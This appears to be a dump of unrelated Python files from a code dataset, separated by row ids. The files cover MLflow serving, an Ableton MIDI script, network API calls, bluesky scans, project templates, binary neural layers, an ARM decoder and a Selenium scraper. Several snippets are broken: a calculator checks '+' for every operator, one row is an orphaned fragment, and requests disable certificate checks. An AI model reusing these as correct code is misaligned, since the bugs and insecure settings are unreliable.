@click.option("--port", "-p", default=5000, help="Server port. [default: 5000]")
@click.option("--host", "-h", default="127.0.0.1", help="Server host. [default: 127.0.0.1]")
@cli_args.NO_CONDA
def serve(model_path, run_id, port, host, no_conda):
    """
    Serve a PythonFunction model saved with MLflow.
    If a ``run_id`` is specified, ``model-path`` is treated as an artifact path within that run;
    otherwise it is treated as a local path.
    """
    if run_id:
        model_path = _get_model_log_dir(model_path, run_id)
    # If the model bundles a conda environment and conda use is allowed,
    # re-exec this command inside that environment instead of serving here.
    model_env_file = _load_model_env(model_path)
    if not no_conda and model_env_file is not None:
        conda_env_path = os.path.join(model_path, model_env_file)
        return _rerun_in_conda(conda_env_path)
    app = scoring_server.init(load_pyfunc(model_path))
    app.run(port=port, host=host)
@commands.command("predict")
@cli_args.MODEL_PATH
@cli_args.RUN_ID
@click.option("--input-path", "-i", help="CSV containing pandas DataFrame to predict against.",
              required=True)
@click.option("--output-path", "-o", help="File to output results to as CSV file." +
              " If not provided, output to stdout.")
@cli_args.NO_CONDA
def predict(model_path, run_id, input_path, output_path, no_conda):
    """
    Load a pandas DataFrame and runs a python_function model saved with MLflow against it.
    Return the prediction results as a CSV-formatted pandas DataFrame.
    If a ``run-id`` is specified, ``model-path`` is treated as an artifact path within that run;
    otherwise it is treated as a local path.
    """
    from contextlib import nullcontext
    if run_id:
        model_path = _get_model_log_dir(model_path, run_id)
    # If the model bundles a conda environment and conda use is allowed,
    # re-exec this command inside that environment instead of predicting here.
    model_env_file = _load_model_env(model_path)
    if not no_conda and model_env_file is not None:
        conda_env_path = os.path.join(model_path, model_env_file)
        return _rerun_in_conda(conda_env_path)
    model = load_pyfunc(model_path)
    df = pandas.read_csv(input_path)
    result = model.predict(df)
    # Bug fix: the original opened `output_path` without ever closing it,
    # leaking the handle and risking unflushed output. Route both cases
    # through a context manager; nullcontext keeps stdout from being closed.
    out_cm = open(output_path, 'w') if output_path else nullcontext(sys.stdout)
    with out_cm as out_stream:
        pandas.DataFrame(data=result).to_csv(out_stream, header=False, index=False)
|
15,128 | 24518ca38cdc12eb6ce019345983e1cd04702b26 | #Embedded file name: C:\ProgramData\Ableton\Live 9 Suite\Resources\MIDI Remote Scripts\Maschine_Mk1\MaschineChannelStripComponent.py
import Live
from _Framework.ChannelStripComponent import ChannelStripComponent
from _Framework.ButtonElement import ButtonElement
from _Framework.InputControlElement import *
from MIDI_Map import debug_out
class MaschineChannelStripComponent(ChannelStripComponent):
    """Channel strip with a 'clear automation envelope' mode.

    While clear mode is active, moving/touching a volume, pan or send control
    (or the mute button) erases that parameter's envelope from the currently
    playing clip instead of changing the parameter.
    """

    def __init__(self):
        ChannelStripComponent.__init__(self)
        self.deleted = {}  # message ids already cleared in this clear-mode session
        self.clear_mode = False
        self.touch_mode = False
        self.send_control = None
        self.clear_vol_button = None
        self.clear_pan_button = None
        self.clear_send_button = None

    def set_touch_mode(self, touchchannel):
        # Touch mode mirrors each control on a dedicated MIDI channel so a
        # touch event (rather than a value change) triggers the clearing.
        self.touch_mode = True
        id_vol = self._volume_control.message_identifier()
        id_pan = self._pan_control.message_identifier()
        id_send = None
        for send in self._send_controls:
            if send:
                id_send = send.message_identifier()
        self.clear_vol_button = ButtonElement(False, MIDI_CC_TYPE, touchchannel, id_vol)
        self.clear_vol_button.add_value_listener(self._do_clear_vol)
        self.clear_pan_button = ButtonElement(False, MIDI_CC_TYPE, touchchannel, id_pan)
        self.clear_pan_button.add_value_listener(self._do_clear_pan)
        self.clear_send_button = ButtonElement(False, MIDI_CC_TYPE, touchchannel, id_send)
        self.clear_send_button.add_value_listener(self._do_clear_send)
        for send in self._send_controls:
            if send:
                self.send_control = send

    def enter_clear(self):
        self.clear_mode = True
        self.deleted = {}
        if not self.touch_mode:
            # Without touch support, temporarily hijack the regular controls'
            # value listeners for the duration of clear mode.
            self.set_enabled(False)
            self._volume_control.add_value_listener(self._do_clear_vol)
            self._pan_control.add_value_listener(self._do_clear_pan)
            for send in self._send_controls:
                if send:
                    self.send_control = send
                    send.add_value_listener(self._do_clear_send)

    def exit_clear(self):
        self.clear_mode = False
        if not self.touch_mode:
            self._volume_control.remove_value_listener(self._do_clear_vol)
            self._pan_control.remove_value_listener(self._do_clear_pan)
            for send in self._send_controls:
                if send:
                    send.remove_value_listener(self._do_clear_send)
            self.set_enabled(True)

    def _do_clear_vol(self, value):
        key = self._volume_control.message_identifier()
        if self.clear_mode and key not in self.deleted:
            self.deleted[key] = True  # clear each envelope at most once per session
            playing_clip = self._get_playing_clip()
            if playing_clip:
                playing_clip.clear_envelope(self._track.mixer_device.volume)

    def _do_clear_pan(self, value):
        key = self._pan_control.message_identifier()
        if self.clear_mode and key not in self.deleted:
            self.deleted[key] = True
            playing_clip = self._get_playing_clip()
            if playing_clip:
                playing_clip.clear_envelope(self._track.mixer_device.panning)

    def _do_clear_send(self, value):
        key = self.send_control.message_identifier()
        if self.clear_mode and key not in self.deleted:
            send_index = len(self._send_controls) - 1
            self.deleted[key] = True
            playing_clip = self._get_playing_clip()
            if playing_clip and send_index in range(len(self._track.mixer_device.sends)):
                playing_clip.clear_envelope(self._track.mixer_device.sends[send_index])

    def _mute_value(self, value):
        super(MaschineChannelStripComponent, self)._mute_value(value)
        key = self._mute_button.message_identifier()
        if self.clear_mode and key not in self.deleted:
            self.deleted[key] = True
            playing_clip = self._get_playing_clip()
            if playing_clip:
                playing_clip.clear_envelope(self._track.mixer_device.track_activator)

    def _get_playing_clip(self):
        # Returns the first playing clip on this strip's track, or None.
        if self._track == None:
            return
        clips_slots = self._track.clip_slots
        for cs in clips_slots:
            if cs.has_clip and cs.is_playing:
                return cs.clip

    def disconnect(self):
        # Bug fix: the original nulled clear_pan_button and clear_send_button
        # *before* the listener-removal checks below, so those two listeners
        # were never detached. Remove listeners first, then drop references.
        if self.clear_vol_button != None:
            self.clear_vol_button.remove_value_listener(self._do_clear_vol)
            self.clear_vol_button = None
        if self.clear_pan_button != None:
            self.clear_pan_button.remove_value_listener(self._do_clear_pan)
            self.clear_pan_button = None
        if self.clear_send_button != None:
            self.clear_send_button.remove_value_listener(self._do_clear_send)
            self.clear_send_button = None
        if not self.touch_mode and self.clear_mode:
            if self.send_control != None:
                self.send_control.remove_value_listener(self._do_clear_send)
                self.send_control = None
            if self._volume_control != None:
                self._volume_control.remove_value_listener(self._do_clear_vol)
                self._volume_control = None
            if self._pan_control != None:
                self._pan_control.remove_value_listener(self._do_clear_pan)
                self._pan_control = None
        super(MaschineChannelStripComponent, self).disconnect()
15,129 | 4c4caca505d434495e03231b83b651f6e8978751 |
def fun(x,y,op) :
if x and y !=0 and op !=None :
if op == '+':
return x+y
elif op == '+':
return x-y
elif op == '+':
return x*y
else:
return x/y
print(fun(10,15,'+')) |
15,130 | af01ef154f8845436c9b79896006a2477a5e6a25 | """asd"""
class World():
    """Container for a world's physics parameters (name, acceleration, resistance, propulsors)."""
    # NOTE(review): these class-level dicts are shared mutable attributes; they
    # are shadowed by the instance attributes set in __init__, so they matter
    # only for attribute access on the class itself.
    name = 'Unknown planet'
    acceleration = {}
    resistance = {}
    propulsors = {}
    def __init__(self, name, acceleration, resistance, propulsors):
        self.name = name
        self.acceleration = acceleration
        self.resistance = resistance
        self.propulsors = propulsors
    def move_object(self, obj, forces):
        """TODO: update an object's properties after moving in this world"""
    def shake(self):
        """TODO: do something interesting"""
15,131 | a6160186ddf8d26cf679f60d5073d8051343bc79 | import requests
import json
from tabulate import *
import urllib3
version = "v1"
def get_NetworkHostInventory(api_url, ticket):
    """Print a numbered table of hosts known to the controller (/host API)."""
    endpoint = api_url + "/api/" + version + "/host"
    headers = {
        "content-type": "application/json",
        "X-Auth-Token": ticket
    }
    resp = requests.get(endpoint, headers=headers, verify=False)
    print("Status of /host request: ", resp.status_code)
    if resp.status_code != 200:
        raise Exception(
            "Status code does not equal 200. Response text: " + resp.text)
    host_list = [
        [number, item["hostType"], item["hostIp"]]
        for number, item in enumerate(resp.json()["response"], start=1)
    ]
    print(tabulate(host_list, ["Number", "Type", "IP"]))
def get_IPGeolocation(api_url, ticket, ip):
    """Print every geolocation attribute reported for *ip* (ipgeo API)."""
    api_url = api_url + "/api/"+version+"/ipgeo/"+ip
    headers = {
        "content-type": "application/json",
        "X-Auth-Token": ticket
    }
    resp = requests.get(api_url, headers=headers, verify=False)
    print("Status of /host request: ", resp.status_code)
    if resp.status_code != 200:
        raise Exception(
            "Status code does not equal 200. Response text: " + resp.text)
    response_json = resp.json()
    try:
        for key, value in response_json["response"][ip].items():
            if(value == None):
                print(key + "-->DESCONOCIDO")
            else:
                # NOTE(review): assumes every non-None value is a string; a
                # non-str value would raise TypeError (caught and printed below).
                print(key+"-->"+value)
    except Exception as e:
        print(e)
def get_FlowAnalysis(api_url, ticket):
    """Print a numbered table of flow-analysis (path trace) results."""
    api_url = api_url + "/api/"+version+"/flow-analysis"
    headers = {
        "content-type": "application/json",
        "X-Auth-Token": ticket
    }
    resp = requests.get(api_url, headers=headers, verify=False)
    if resp.status_code != 200:
        raise Exception(
            "Status code does not equal 200. Response text: " + resp.text)
    response_json = resp.json()
    lista = []
    table_header = ["Numero", "IP Origen", "Puerto Origen",
                    "IP Destino", "Puerto Destino", "Protocolo", "Status"]
    # Bug fixes vs. the original:
    #  * row numbering started at 2 (i was initialised to 1 and incremented
    #    before use); rows now start at 1, matching the other listings.
    #  * the optional-field checks tested membership in `lista` (the output
    #    table!) instead of in `item`, so the real values were never printed.
    for i, item in enumerate(response_json["response"], start=1):
        lista.append([
            i,
            item["sourceIP"],
            item["sourcePort"] if "sourcePort" in item else "---",
            item["destIP"],
            item["destPort"] if "destPort" in item else "---",
            item["protocol"] if "protocol" in item else "---",
            item["status"]
        ])
    print(tabulate(lista, table_header))
def get_Interfaces(api_url, ticket):
    """Print every attribute of every interface known to the controller."""
    api_url = api_url + "/api/"+version+"/interface"
    headers = {
        "content-type": "application/json",
        "X-Auth-Token": ticket
    }
    resp = requests.get(api_url, headers=headers, verify=False)
    if resp.status_code != 200:
        raise Exception(
            "Status code does not equal 200. Response text: " + resp.text)
    response_json = resp.json()
    i = 0
    for item in response_json["response"]:
        i += 1
        print("\n\n=========Interface " + str(i) + " =======")
        for key, value in item.items():
            # Skip null-ish values. NOTE(review): a non-string value would make
            # the concatenation below raise TypeError -- confirm the API only
            # returns strings here.
            if(value != "null" and value != "" and value != None):
                print(key + "-->" + value)
|
15,132 | 48bb2ce954839904f5785d7304d56c806fa545f1 | import bluesky.preprocessors as bpp
import bluesky
import bluesky.plan_stubs as bps
from bluesky.plan_stubs import sleep, abs_set
from bluesky.plans import rel_grid_scan, rel_spiral, rel_spiral_fermat, rel_spiral_square
from ophyd import EpicsScaler, EpicsSignal
# EPICS signals for the 2D fly-scan stage: each pairs a readback PV (-RB)
# with its setpoint PV so reads reflect what the IOC actually accepted.
xstart = EpicsSignal(read_pv='HXN{2DStage}XStart-RB', write_pv='HXN{2DStage}XStart')
xstop = EpicsSignal(read_pv='HXN{2DStage}XStop-RB', write_pv='HXN{2DStage}XStop')
ystart = EpicsSignal(read_pv='HXN{2DStage}YStart-RB', write_pv='HXN{2DStage}YStart')
ystop = EpicsSignal(read_pv='HXN{2DStage}YStop-RB', write_pv='HXN{2DStage}YStop')
nx = EpicsSignal(read_pv='HXN{2DStage}NX-RB', write_pv='HXN{2DStage}NX')
ny = EpicsSignal(read_pv='HXN{2DStage}NY-RB', write_pv='HXN{2DStage}NY')
# Writing 1 to StartScan.PROC triggers the scan on the IOC side.
go = EpicsSignal(read_pv='HXN{2DStage}StartScan.PROC', write_pv='HXN{2DStage}StartScan.PROC')
'''
def fly_plan():
"""This is my plan"""
yield from bluesky.plan_stubs.mv(xstart, 0.100)
yield from bluesky.plan_stubs.mv(xstop, 0.200)
yield from bluesky.plan_stubs.mv(ystart, 0.100)
yield from bluesky.plan_stubs.mv(ystop, 0.200)
yield from bluesky.plan_stubs.mv(nx, 3)
yield from bluesky.plan_stubs.mv(ny, 3)
yield from bluesky.plan_stubs.mv(go, 1)
print('hello')
yield from sleep(2)
# Read image: XF:03ID-BI{CAM:1}image1:ArrayData
print('done')
'''
def step_scan(*, detector,
              x_motor, y_motor,
              x_start=-5, x_end=5, x_num=11,
              y_start=-5, y_end=5, y_num=11,
              exposure_time=0.01, num_images=1):
    """Relative rectangular step scan of (x_motor, y_motor) with `detector`.

    Fixes: configure the detector that was passed in (the original set the
    acquire time on a global `flyer`), and reference the plan stubs and the
    grid-scan plan through the imported `bluesky` package instead of the
    undefined names `bps` / `rel_grid_scan`.
    """
    yield from bluesky.plan_stubs.mv(detector.cam.num_images, num_images)
    yield from bluesky.plan_stubs.mv(detector.cam.acquire_time, exposure_time)
    # Slow axis (y) outer, fast axis (x) inner; False = no snake.
    yield from bluesky.plans.rel_grid_scan([detector],
                                           y_motor, y_start, y_end, y_num,
                                           x_motor, x_start, x_end, x_num,
                                           False)
def spiral(*, detector,
           x_motor, y_motor,
           x_range=1, x_num=11,
           y_range=1, y_num=11,
           dr=0.1, dr_y=None,
           nth=5,
           exposure_time=0.01, num_images=1):
    """Relative simple spiral scan around the current (x, y) position.

    Fixes: use the `detector`, `x_motor` and `y_motor` that were passed in
    (the original ignored them and scanned the globals `det`, `motor1`,
    `motor2`) and configure the detector directly instead of via `flyer`.
    """
    yield from bluesky.plan_stubs.mv(detector.cam.num_images, num_images)
    yield from bluesky.plan_stubs.mv(detector.cam.acquire_time, exposure_time)
    yield from rel_spiral([detector], x_motor, y_motor,
                          x_range=x_range, y_range=y_range,
                          dr=dr, dr_y=dr_y, nth=nth)
def fermat(*, detector,
           x_motor, y_motor,
           x_range=1, x_num=11,
           y_range=1, y_num=11,
           dr=0.1, factor=1,
           exposure_time=0.01, num_images=1):
    """Relative Fermat-spiral scan around the current (x, y) position.

    Fixes: scan the passed-in `detector`/`x_motor`/`y_motor` (the original
    ignored its parameters and used the globals `det`, `motor1`, `motor2`)
    and configure the detector directly instead of via `flyer`.
    """
    yield from bluesky.plan_stubs.mv(detector.cam.num_images, num_images)
    yield from bluesky.plan_stubs.mv(detector.cam.acquire_time, exposure_time)
    yield from rel_spiral_fermat([detector], x_motor, y_motor,
                                 x_range=x_range, y_range=y_range,
                                 dr=dr, factor=factor, tilt=0.0)
def spiral_square(*, detector,
                  x_motor, y_motor,
                  x_range=1, x_num=11,
                  y_range=1, y_num=11,
                  exposure_time=0.01, num_images=1):
    """Relative square-spiral scan around the current (x, y) position.

    Fixes: scan the passed-in `detector`/`x_motor`/`y_motor` (the original
    ignored its parameters and used the globals `det`, `motor1`, `motor2`)
    and configure the detector directly instead of via `flyer`.
    """
    yield from bluesky.plan_stubs.mv(detector.cam.num_images, num_images)
    yield from bluesky.plan_stubs.mv(detector.cam.acquire_time, exposure_time)
    yield from rel_spiral_square([detector], x_motor, y_motor,
                                 x_range=x_range, y_range=y_range,
                                 x_num=x_num, y_num=y_num)
'''
def step_scan(*, cam,
x_motor=None, x_start=-5, x_end=5, x_num=11,
y_motor=None, y_start=-5, y_end=5, y_num=11,
exposure_time=0.01):
assert x_motor, 'Provide x_motor object'
assert y_motor, 'Provide y_motor object'
x_home = x_motor.position
y_home = y_motor.position
def move_home():
yield from bps.mov(x_motor, x_home,
y_motor, y_home)
def main():
yield from bps.mov(cam.cam.acquire_time, exposure_time)
yield from bp.grid_scan([cam],
y_motor, y_home+y_start, y_home+y_end, y_num,
x_motor, x_home+x_start, x_home+x_end, x_num,
False)
yield from bps.mov(x_motor, x_home, y_motor, y_home)
yield from bpp.finalize_wrapper(main(), move_home())
'''
|
15,133 | a8de204ea32edd8cfc76ed459535a17d59790bf7 | import json
# Persisted settings file and the default (blank) schema; empty values are
# filled in interactively by wizard().
env_file = "env.json"
info = {"music_home": ""}
def save(file, environment):
    """Serialise the *environment* dict to *file* as JSON.

    Uses a context manager so the handle is closed even if the dump fails
    (the original left the file open on error).
    """
    with open(file, 'w') as f:
        f.write(json.dumps(environment))
def load_json(file):
    """Parse *file* as JSON; warn and return {} when the content is malformed."""
    with open(file) as json_file:
        try:
            return json.load(json_file)
        except ValueError:
            print("Error parsing environment file!")
            return {}
def load_environment():
    """Load the saved environment; create an empty file and return {} on first run."""
    try:
        return load_json(env_file)
    except IOError:
        # First run: touch the file so later loads and saves succeed.
        open(env_file, 'w').close()
        return {}
def wizard(environment):
    """Prompt the user for a value for every key that is still empty.

    Mutates and returns the same dict that was passed in.
    """
    for key in environment:
        if not environment[key]:
            environment[key] = input("Enter value for %s: " % key)
    return environment
def get_environment():
    """Return the fully populated environment, persisting any new answers.

    Saved values override the defaults in `info`; blanks are filled via
    wizard() and the merged result is written back to `env_file`.
    """
    merged = info
    merged.update(load_environment())
    completed = wizard(merged)
    save(env_file, completed)
    return completed
# Script entry point: resolve the environment (prompting as needed) and echo it.
print(get_environment())
|
15,134 | 60b50c98682b065b531597e0b1057d78dafeb8cc | elif text == "INV /":
self.__model.invDiv()
|
15,135 | e0c61dc6a475c50570affacc6f5bb0314af8cd33 | # -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
import torch
import torch.nn.functional as F
from torch.autograd import Function
from torch.distributions.binomial import Binomial
def where(cond, x1, x2):
    """Differentiable select: x1 where cond is 1, x2 where 0.

    For fractional cond values this is a linear blend, not a hard select.
    """
    mask = cond.float()
    return mask * x1 + (1. - mask) * x2
class BinaryLinearFunction(Function):
    """Linear layer whose weights are binarized to +/-1 in the forward pass.

    Straight-through estimator: forward uses sign-binarized weights, while
    backward accumulates grad_weight against the full-precision input so
    the real-valued weights keep learning.
    """

    @classmethod
    def forward(cls, ctx, input, weight, bias=None):
        ctx.save_for_backward(input, weight, bias)
        # Cache the binarized weights so backward does not re-binarize.
        ctx.intermediate_results = weight_b = cls._get_binary(weight)
        output = input.mm(weight_b.t())
        if bias is not None:
            output += bias.unsqueeze(0).expand_as(output)
        return output

    @classmethod
    def _get_binary(cls, weight):
        # BUG FIX: binarize by sign.  The old `where(weight, 1., -1.)`
        # treated the raw weights as a blend mask and returned 2*w - 1
        # instead of +/-1 (cf. BinaryStraightThroughFunction.forward).
        return torch.where(weight >= 0,
                           torch.ones_like(weight),
                           -torch.ones_like(weight))

    @classmethod
    def backward(cls, ctx, grad_output):
        input, weight, bias = ctx.saved_variables
        weight_b = ctx.intermediate_results
        grad_input = grad_weight = grad_bias = None
        if ctx.needs_input_grad[0]:
            # Gradient w.r.t. the input flows through the binarized weights.
            grad_input = grad_output.mm(weight_b)
        if ctx.needs_input_grad[1]:
            grad_weight = grad_output.t().mm(input)
        if bias is not None and ctx.needs_input_grad[2]:
            grad_bias = grad_output.sum(0).squeeze(0)
        return grad_input, grad_weight, grad_bias
class StochasticLinearFunction(BinaryLinearFunction):
    """Binary linear layer with stochastic (noise-thresholded) binarization.

    Each weight becomes +1 when it exceeds a fresh uniform(-1, 1) draw and
    -1 otherwise.
    """

    @classmethod
    def _get_binary(cls, weight):
        # FIX: allocate noise and constants on the weight's own device via
        # *_like() instead of hard-coding .cuda(), so CPU-only runs work
        # too (GPU tensors still stay on the GPU).
        noise = torch.empty_like(weight).uniform_(-1, 1)
        return torch.where(torch.sign(weight - noise) > 0,
                           torch.ones_like(weight),
                           -torch.ones_like(weight))
class LinearFunction(Function):
    """Plain full-precision affine map, y = x W^T (+ b), as an autograd Function."""

    @classmethod
    def forward(cls, ctx, input, weight, bias=None):
        ctx.save_for_backward(input, weight, bias)
        result = input.mm(weight.t())
        if bias is None:
            return result
        return result + bias.unsqueeze(0).expand_as(result)

    @classmethod
    def backward(cls, ctx, grad_output):
        saved_input, saved_weight, saved_bias = ctx.saved_variables
        grad_input = grad_weight = grad_bias = None
        needs = ctx.needs_input_grad
        if needs[0]:
            grad_input = grad_output.mm(saved_weight)
        if needs[1]:
            grad_weight = grad_output.t().mm(saved_input)
        if saved_bias is not None and needs[2]:
            grad_bias = grad_output.sum(0).squeeze(0)
        return grad_input, grad_weight, grad_bias
class BinaryStraightThroughFunction(Function):
    """Sign binarization with the straight-through gradient estimator.

    forward: +1 where input >= 0, -1 elsewhere.
    backward: passes the gradient through unchanged wherever |input| <= 1
    and zeroes it outside that window (hard-tanh clipping).
    """

    @staticmethod
    def forward(ctx, input):
        ctx.save_for_backward(input)
        return where(input >= 0, 1, -1)

    @staticmethod
    def backward(ctx, grad_output):
        saved = ctx.saved_variables
        window = where(torch.abs(saved[0]) <= 1, 1., 0.)
        return grad_output.clone() * window
# Convenience aliases mirroring torch.nn.functional naming.  Call these
# (never .forward directly) so autograd records the operation.
binary_linear = BinaryLinearFunction.apply
stoch_binary_linear = StochasticLinearFunction.apply
linear = LinearFunction.apply
bst = BinaryStraightThroughFunction.apply
|
15,136 | 82a40cc491c81f1d52bb2fbca1acc6489eb2fde4 | from util import save_wav
import sound_recorder
WAVE_OUTPUT_FILENAME = "output.wav"
def main():
    """Open the live amplitude-spectrum display (blocks until it is closed)."""
    sound_recorder.live_amplitude_spectrum()
    # Offline alternative: record 25 s of audio and dump it to WAVE_OUTPUT_FILENAME.
    # data = sound_recorder.record(25)
    # save_wav(data, filename=WAVE_OUTPUT_FILENAME, channels=sound_recorder.CHANNELS)
if __name__ == '__main__':
    main()
|
# Scaffolding templates for generated projects, keyed by framework and then
# by target file name.  Flask '__init__' and 'routes' come in a 'db'
# (SQLAlchemy-backed) and a 'nodb' variant.
# FIX: the fastapi 'models' template declared `class Exacple` — corrected
# to `Example` so generated projects compile against the schema examples.
BLUEPRINTS = {
    'flask': {
        '__init__': {
            'db': (
                "import os"
                "\nfrom flask import Flask"
                "\nfrom flask_sqlalchemy import SQLAlchemy"
                "\nfrom flask_migrate import Migrate\n"
                "\napp = Flask(__name__)"
                "\napp.config['SECRET_KEY'] = os.getenv('SECRET_KEY')"
                "\napp.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL')\n"
                "\ndb = SQLAlchemy(app)"
                "\nmigrate = Migrate(app, db)\n"
                "\nfrom app.models import *"
                "\ndb.create_all()"
                "\ndb.session.commit()\n"
                "\nfrom app import routes\n"
            ),
            'nodb': (
                "import os"
                "\nfrom flask import Flask\n"
                "\napp = Flask(__name__)"
                "\napp.config['SECRET_KEY'] = os.getenv('SECRET_KEY')\n"
                "\nfrom app import routes\n"
            ),
        },
        'wsgi': (
            "from dotenv import load_dotenv"
            "\nload_dotenv()\n"
            "\nfrom app import app\n"
            "\nif __name__ == '__main__':"
            "\n    app.run(debug=True)\n"
        ),
        'routes': {
            'db': (
                "# Create your routes here.\n"
                "\nfrom app import app, db\n"
                "\nfrom app.models import *\n"
                "\nfrom flask import Response\n"
                "\n@app.route('/')"
                "\ndef default():"
                "\n    return Response(status=200)\n"
            ),
            'nodb': (
                "# Create your routes here.\n"
                "\nfrom app import app\n"
                "\nfrom flask import Response\n"
                "\n@app.route('/')"
                "\ndef default():"
                "\n    return Response(status=200)\n"
            ),
        },
        'models': (
            "# Create your models here.\n"
            "\nfrom app import db\n"
            "\nfrom sqlalchemy import Column, Integer\n"
            "\nclass ExampleModel(db.Model):"
            "\n    id = Column(Integer, primary_key=True)\n"
        ),
        'forms': (
            "# Create your forms here.\n"
            "\nfrom flask_wtf import FlaskForm"
            "\nfrom wtforms import StringField"
            "\nfrom wtforms.validators import DataRequired\n"
            "\nclass ExampleForm(FlaskForm):"
            "\n    example_field = StringField('Example', validators=[DataRequired()])\n"
        ),
    },
    'fastapi': {
        'asgi': (
            "from dotenv import load_dotenv"
            "\nload_dotenv()\n"
            "\nfrom os import getenv"
            "\nfrom fastapi import FastAPI\n"
            "\nimport routers"
            "\nfrom db import models, DB_ENGINE\n"
            "\napp: FastAPI = FastAPI("
            "\n    debug=True if getenv('DEBUG') else False,"
            "\n    docs_url='/docs' if getenv('DEBUG') else False,"
            "\n    redoc_url='/redoc' if getenv('DEBUG') else False,"
            "\n    title=getenv('PROJECT_NAME')"
            "\n)\n"
            "\nmodels.DB_BASE.metadata.create_all(DB_ENGINE)\n"
            "\napp.include_router(routers.server.router)\n"
            "\nif __name__ == '__main__':"
            "\n    import uvicorn, psycopg2"
            "\n    uvicorn.run(app, host='127.0.0.1', port=8000)  # alternatively host='localhost'\n"
        ),
        '__init__db': (
            "from os import getenv\n"
            "\nfrom sqlalchemy import create_engine"
            "\nfrom sqlalchemy.ext.declarative import declarative_base"
            "\nfrom sqlalchemy.orm import sessionmaker"
            "\nfrom sqlalchemy.orm.attributes import flag_modified\n"
            "\nuri = getenv('DATABASE_URL')"
            "\nif uri.startswith('postgres://'):"
            "\n    uri = uri.replace('postgres://', 'postgresql://', 1)\n"
            "\nif getenv('DEBUG'):"
            "\n    DB_ENGINE = create_engine(uri, connect_args={'check_same_thread': False})"
            "\nelse:"
            "\n    DB_ENGINE = create_engine(uri)"
            "\ndel uri\n"
            "\nDB_SES_LOCAL = sessionmaker(bind=DB_ENGINE)"
            "\nDB_BASE = declarative_base()\n"
            "\ndef get_db():"
            "\n    db = DB_SES_LOCAL()"
            "\n    try:"
            "\n        yield db"
            "\n    finally:"
            "\n        db.close()\n"
        ),
        'models': (
            "# Create your models here.\n"
            "\nfrom sqlalchemy import Column, Integer, String\n"
            "\nfrom db import DB_BASE\n"
            "\nclass Example(DB_BASE):"
            "\n    __tablename__ = 'example'\n"
            "\n    id = Column(Integer, primary_key=True, index=True)\n"
        ),
        '__init__utils': (
            "from .hashing import *\n"
        ),
        'schemas': (
            "# Create your schemas here.\n"
            "\nfrom typing import List, Optional"
            "\nfrom pydantic import BaseModel\n"
            "\nclass Example(BaseModel):"
            "\n    example_field: str\n"
        ),
        'hashing': (
            "from passlib.context import CryptContext\n"
            "\nPWD_CXT = CryptContext(schemes=['bcrypt'], deprecated='auto')\n"
            "\nclass Hash():"
            "\n    def bcrypt(password: str):"
            "\n        return PWD_CXT.hash(password)\n"
            "\n    def verify(plain_password, hashed_password):"
            "\n        return PWD_CXT.verify(plain_password, hashed_password)\n"
        ),
        '__init__routers': (
            "from os import getenv\n"
            "\nfrom fastapi import APIRouter, Depends"
            "\nfrom sqlalchemy.orm import Session\n"
            "\nfrom db import *"
            "\nfrom db.models import *\n"
            "\nfrom utils import *\n"
            "\nfrom .server import router\n"
        ),
        'server': (
            "from . import *\n"
            "\nrouter = APIRouter(tags=['Server'])\n"
            "\n@router.get('/')"
            "\ndef default():"
            "\n    return {'status': 'Live'}\n"
        ),
    },
}
|
class Solution:
    def findComplement(self, num: int) -> int:
        """Return num with every bit of its binary form (no leading zeros) flipped."""
        flipped = bin(num)[2:].translate(str.maketrans("01", "10"))
        # int() accepts the explicit '0b' prefix when the base is 2.
        return int("0b" + flipped, 2)
|
15,139 | aa97397a5dcd5354488ef5f6e2384b8ed3093ef2 | from armulator.armv6.opcodes.abstract_opcodes.str_immediate_thumb import StrImmediateThumb
from armulator.armv6.opcodes.opcode import Opcode
from armulator.armv6.bits_ops import zero_extend
from armulator.armv6.arm_exceptions import UndefinedInstructionException
class StrImmediateThumbT4(StrImmediateThumb, Opcode):
    """Decoder/executor wrapper for Thumb-2 STR (immediate), encoding T4.

    T4 is the 32-bit form with an 8-bit immediate offset and optional
    index/writeback (pre/post-indexed addressing).
    """
    def __init__(self, instruction, add, wback, index, t, n, imm32):
        Opcode.__init__(self, instruction)
        StrImmediateThumb.__init__(self, add, wback, index, t, n, imm32)
    def is_pc_changing_opcode(self):
        # STR never writes the PC, so execution always falls through.
        return False
    @staticmethod
    def from_bitarray(instr, processor):
        # Field extraction from the 32-bit encoding (bitarray slices):
        # imm8 = offset, P/U/W = index/add/writeback, Rt = source, Rn = base.
        imm8 = instr[24:32]
        wback = instr[23]
        add = instr[22]
        index = instr[21]
        rt = instr[16:20]
        rn = instr[12:16]
        # Rn == PC or (no index, no writeback) is UNDEFINED per the ARM ARM.
        if rn == "0b1111" or (not index and not wback):
            raise UndefinedInstructionException()
        elif rt.uint in (13, 15) or (wback and rn.uint == rt.uint):
            # UNPREDICTABLE encodings are reported but not executed;
            # NOTE(review): this path implicitly returns None to the caller.
            print "unpredictable"
        else:
            imm32 = zero_extend(imm8, 32)
            return StrImmediateThumbT4(instr, **{"add": add, "wback": wback, "index": index, "t": rt.uint,
                                                 "n": rn.uint, "imm32": imm32})
|
15,140 | 34145b6c9e7ccb41d5ff761885522b5aeb4a4b0b | #-*- coding: UTF-8 -*-
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import requests
#중요 태그 : div, li
driver = webdriver.Chrome('C:/Users/Heain/Desktop/2018_FastCampus/Python/Intermediate/chromedriver.exe')
#windows에서 실행할 경우 실행파일의 모든 경로를 작성해야함
my_query = '인공지능'
try :
driver.get('https://naver.com') #사이트로 이동
elem = driver.find_element_by_id('query')
elem.send_keys(my_query) #searching for
elem.send_keys(Keys.RETURN) #enter
try:
print('-'*10,'BLOG TITLES','-'*10)
elem = driver.find_element_by_class_name('_blogBase')
lis = elem.find_elements_by_tag_name('li')
for li in lis:
atag = li.find_element_by_class_name('sh_blog_title')
print(atag.get_attribute('title')) #get_attribute 속성값에 있는 '값'을 가지고 오는 기능
print(atag.get_attribute('href')) #link 주소 가져오기
except Exception as e:
print('None')
try:
print('\n', '-'*10,'NEWS TITLES','-'*10)
elem = driver.find_element_by_class_name('news')
#lis = elem.find_elements_by_tag_name('li') #div하위 모든 li 정보까지 수집 (관련뉴스 포함)
lis = elem.find_elements_by_xpath('./ul/li') #./현재 위치의 하위 ul/ 하위 li만 가져오기
for li in lis:
atag = li.find_element_by_class_name('_sp_each_title')
print(atag.get_attribute('title'))
print(atag.get_attribute('href'))
except Exception as e:
print('None')
try:
print('\n','-'*10,'CAFE TITLES','-'*10)
elem = driver.find_element_by_class_name('_cafeBase')
